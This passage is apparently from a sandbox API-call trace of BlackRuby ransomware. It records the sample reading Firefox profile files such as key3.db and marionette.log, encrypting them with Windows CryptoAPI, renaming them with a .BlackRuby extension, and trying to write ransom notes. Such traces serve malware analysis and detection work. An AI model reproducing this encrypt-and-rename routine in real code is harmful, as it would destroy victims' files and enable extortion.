ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc1711ed0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x27902f40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x118110)) returned 1 [0052.621] GetLastError () returned 0xb7 [0052.621] SetErrorMode (uMode=0x0) returned 0x1 [0052.621] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_wb0AzMt87EjY1iSuYGmPN02PVYLFTybn7R9aF.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_wb0azmt87ejy1isuygmpn02pvylftybn7r9af.blackruby")) returned 1 [0052.621] GetLastError () returned 0xb7 [0052.621] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0052.621] GetLastError () returned 0xb7 [0052.621] SetErrorMode (uMode=0x1) returned 0x0 [0052.621] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0052.622] GetLastError () returned 0x5 [0052.622] SetErrorMode (uMode=0x0) returned 0x1 [0052.623] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db", lpFilePart=0x0) returned 0x52 [0052.623] GetLastError () returned 0x5 [0052.623] SetErrorMode (uMode=0x1) returned 0x0 [0052.623] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db"), fInfoLevelId=0x0, lpFileInformation=0x1b419f8 | out: lpFileInformation=0x1b419f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e3f2f80, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e3f2f80, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc0478a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0052.623] GetLastError () returned 0x5 [0052.623] SetErrorMode (uMode=0x0) returned 0x1 [0052.623] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db", lpFilePart=0x0) returned 0x52 [0052.623] GetLastError () returned 0x5 [0052.623] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db", lpFilePart=0x0) returned 0x52 [0052.623] GetLastError () returned 0x5 [0052.623] SetErrorMode (uMode=0x1) returned 0x0 [0052.623] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.623] GetLastError () returned 0x0 [0052.623] GetFileType (hFile=0x184) returned 0x1 [0052.623] SetErrorMode (uMode=0x0) returned 0x1 [0052.623] GetFileType (hFile=0x184) returned 0x1 [0052.623] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x4000 [0052.623] GetLastError () returned 0x0 [0052.623] ReadFile (in: hFile=0x184, lpBuffer=0x1b43914, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1b43914*, lpNumberOfBytesRead=0x18eb68*=0x4000, lpOverlapped=0x0) returned 1 [0052.632] GetLastError () returned 0x0 [0052.632] CloseHandle (hObject=0x184) returned 1 [0052.632] GetLastError () returned 0x0 [0052.632] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db", lpFilePart=0x0) returned 0x52 [0052.632] GetLastError () returned 0x0 [0052.632] SetErrorMode (uMode=0x1) returned 0x0 [0052.632] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e3f2f80, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e3f2f80, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc0478a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0052.632] GetLastError () returned 0x0 [0052.632] SetErrorMode (uMode=0x0) returned 0x1 [0052.632] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c708) returned 1 [0052.632] GetLastError () returned 0x0 [0052.665] CryptImportKey (in: hProv=0x37c708, pbData=0x1ba5cf8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360e20) returned 1 [0052.665] GetLastError () returned 0x0 [0052.666] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.666] GetLastError () returned 0x0 [0052.671] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.671] GetLastError () returned 0x0 [0052.671] CryptDuplicateKey (in: hKey=0x360e20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360de0) returned 1 [0052.671] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.671] GetLastError () returned 0x0 [0052.671] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1bd2d44*=0x1, dwFlags=0x0) returned 1 [0052.671] GetLastError () returned 0x0 [0052.671] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1bd2d10, dwFlags=0x0) returned 1 [0052.671] GetLastError () returned 0x0 [0052.671] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bd2d8c*, pdwDataLen=0x18eb58*=0x4100, dwBufLen=0x4100 | out: pbData=0x1bd2d8c*, pdwDataLen=0x18eb58*=0x4100) returned 1 [0052.671] GetLastError () returned 0x0 [0052.671] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bdafb8*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1bdafb8*, pdwDataLen=0x18eb70*=0x10) returned 1 [0052.671] GetLastError () returned 0x0 [0052.671] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bdafe8*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1bdafe8*, pdwDataLen=0x18eb78*=0x10) returned 1 [0052.671] GetLastError () returned 0x0 [0052.672] CryptDestroyKey (hKey=0x360e20) returned 1 [0052.672] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.672] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.672] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db", lpFilePart=0x0) returned 0x52 [0052.672] GetLastError () returned 0x0 [0052.672] SetErrorMode (uMode=0x1) returned 0x0 [0052.672] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.673] GetLastError () returned 0xb7 [0052.673] GetFileType (hFile=0x184) returned 0x1 [0052.673] SetErrorMode (uMode=0x0) returned 0x1 [0052.673] GetFileType (hFile=0x184) returned 0x1 [0052.674] CloseHandle (hObject=0x184) returned 1 [0052.674] GetLastError () returned 0xb7 [0052.674] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db", lpFilePart=0x0) returned 0x52 [0052.674] GetLastError () returned 0xb7 [0052.674] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_88eMQygH0CE7xPFmZtz8K4lAUaIUB7dYO0XEndt8m.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_88eMQygH0CE7xPFmZtz8K4lAUaIUB7dYO0XEndt8m.BlackRuby", lpFilePart=0x0) returned 0x88 [0052.674] GetLastError () returned 0xb7 [0052.674] SetErrorMode (uMode=0x1) returned 0x0 [0052.674] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e3f2f80, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e3f2f80, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x2799b4c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x4110)) returned 1 [0052.674] GetLastError () returned 0xb7 [0052.674] SetErrorMode (uMode=0x0) returned 0x1 [0052.674] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\key3.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_88eMQygH0CE7xPFmZtz8K4lAUaIUB7dYO0XEndt8m.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_88emqygh0ce7xpfmztz8k4lauaiub7dyo0xendt8m.blackruby")) returned 1 [0052.675] GetLastError () returned 0xb7 [0052.675] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0052.675] GetLastError () returned 0xb7 [0052.675] SetErrorMode (uMode=0x1) returned 0x0 [0052.675] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0052.675] GetLastError () returned 0x5 [0052.677] SetErrorMode (uMode=0x0) returned 0x1 [0052.677] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\localstore.rdf", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\localstore.rdf", lpFilePart=0x0) returned 0x59 [0052.677] GetLastError () returned 0x5 [0052.677] SetErrorMode (uMode=0x1) returned 0x0 [0052.677] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\localstore.rdf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\localstore.rdf"), fInfoLevelId=0x0, lpFileInformation=0x1c04908 | out: lpFileInformation=0x1c04908*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbffb5e0, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xbffb5e0, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xc021740, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x5b4)) returned 1 [0052.678] GetLastError () returned 0x5 [0052.678] SetErrorMode (uMode=0x0) returned 0x1 [0052.678] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0052.678] GetLastError () returned 0x5 [0052.678] SetErrorMode (uMode=0x1) returned 0x0 [0052.679] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0052.679] GetLastError () returned 0x5 [0052.680] SetErrorMode (uMode=0x0) returned 0x1 [0052.680] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log", lpFilePart=0x0) returned 0x59 [0052.680] GetLastError () returned 0x5 [0052.680] SetErrorMode (uMode=0x1) returned 0x0 [0052.680] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log"), fInfoLevelId=0x0, lpFileInformation=0x1c225b8 | out: lpFileInformation=0x1c225b8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84d21ba0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x84d21ba0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc12c0e0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x39)) returned 1 [0052.680] GetLastError () returned 0x5 [0052.681] SetErrorMode (uMode=0x0) returned 0x1 [0052.681] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log", lpFilePart=0x0) returned 0x59 [0052.681] GetLastError () returned 0x5 [0052.681] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log", lpFilePart=0x0) returned 0x59 [0052.681] GetLastError () returned 0x5 [0052.681] SetErrorMode (uMode=0x1) returned 0x0 [0052.681] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.681] GetLastError () returned 0x0 [0052.681] GetFileType (hFile=0x184) returned 0x1 [0052.681] SetErrorMode (uMode=0x0) returned 0x1 [0052.681] GetFileType (hFile=0x184) returned 0x1 [0052.681] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x39 [0052.681] GetLastError () returned 0x0 [0052.681] ReadFile (in: hFile=0x184, lpBuffer=0x1c2419c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1c2419c*, lpNumberOfBytesRead=0x18eb68*=0x39, lpOverlapped=0x0) returned 1 [0052.682] GetLastError () returned 0x0 [0052.682] CloseHandle (hObject=0x184) returned 1 [0052.682] GetLastError () returned 0x0 [0052.682] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log", lpFilePart=0x0) returned 0x59 [0052.682] GetLastError () returned 0x0 [0052.682] SetErrorMode (uMode=0x1) returned 0x0 [0052.682] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84d21ba0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x84d21ba0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc12c0e0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x39)) returned 1 [0052.682] GetLastError () returned 0x0 [0052.682] SetErrorMode (uMode=0x0) returned 0x1 [0052.682] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c818) returned 1 [0052.683] GetLastError () returned 0x0 [0052.721] CryptImportKey (in: hProv=0x37c818, pbData=0x1c7f5dc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360c20) returned 1 [0052.721] GetLastError () returned 0x0 [0052.721] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.721] GetLastError () returned 0x0 [0052.726] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.726] GetLastError () returned 0x0 [0052.726] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360a20) returned 1 [0052.726] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.726] GetLastError () returned 0x0 [0052.726] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1cac628*=0x1, dwFlags=0x0) returned 1 [0052.726] GetLastError () returned 0x0 [0052.726] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1cac5f4, dwFlags=0x0) returned 1 [0052.726] GetLastError () returned 0x0 [0052.726] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cac670*, pdwDataLen=0x18eb58*=0x130, dwBufLen=0x130 | out: pbData=0x1cac670*, pdwDataLen=0x18eb58*=0x130) returned 1 [0052.726] GetLastError () returned 0x0 [0052.726] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cac8fc*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1cac8fc*, pdwDataLen=0x18eb70*=0x10) returned 1 [0052.726] GetLastError () returned 0x0 [0052.726] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cac92c*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1cac92c*, pdwDataLen=0x18eb78*=0x10) returned 1 [0052.726] GetLastError () returned 0x0 [0052.726] CryptDestroyKey (hKey=0x360c20) returned 1 [0052.726] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0052.726] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0052.726] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log", lpFilePart=0x0) returned 0x59 [0052.726] GetLastError () returned 0x0 [0052.726] SetErrorMode (uMode=0x1) returned 0x0 [0052.726] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.727] GetLastError () returned 0xb7 [0052.727] GetFileType (hFile=0x184) returned 0x1 [0052.727] SetErrorMode (uMode=0x0) returned 0x1 [0052.727] GetFileType (hFile=0x184) returned 0x1 [0052.728] CloseHandle (hObject=0x184) returned 1 [0052.730] GetLastError () returned 0xb7 [0052.730] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log", lpFilePart=0x0) returned 0x59 [0052.730] GetLastError () returned 0xb7 [0052.730] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_uygaU3G6UpvPQJbXiACMrzBlizPT3S2SZZaA.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_uygaU3G6UpvPQJbXiACMrzBlizPT3S2SZZaA.BlackRuby", lpFilePart=0x0) returned 0x83 [0052.730] GetLastError () returned 0xb7 [0052.730] SetErrorMode (uMode=0x1) returned 0x0 [0052.730] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84d21ba0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x84d21ba0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x27a0d8e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x140)) returned 1 [0052.730] GetLastError () returned 0xb7 [0052.730] SetErrorMode (uMode=0x0) returned 0x1 [0052.730] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\marionette.log" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_uygaU3G6UpvPQJbXiACMrzBlizPT3S2SZZaA.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_uygau3g6upvpqjbxiacmrzblizpt3s2szzaa.blackruby")) returned 1 [0052.730] GetLastError () returned 0xb7 [0052.731] GetFullPathNameW (in: 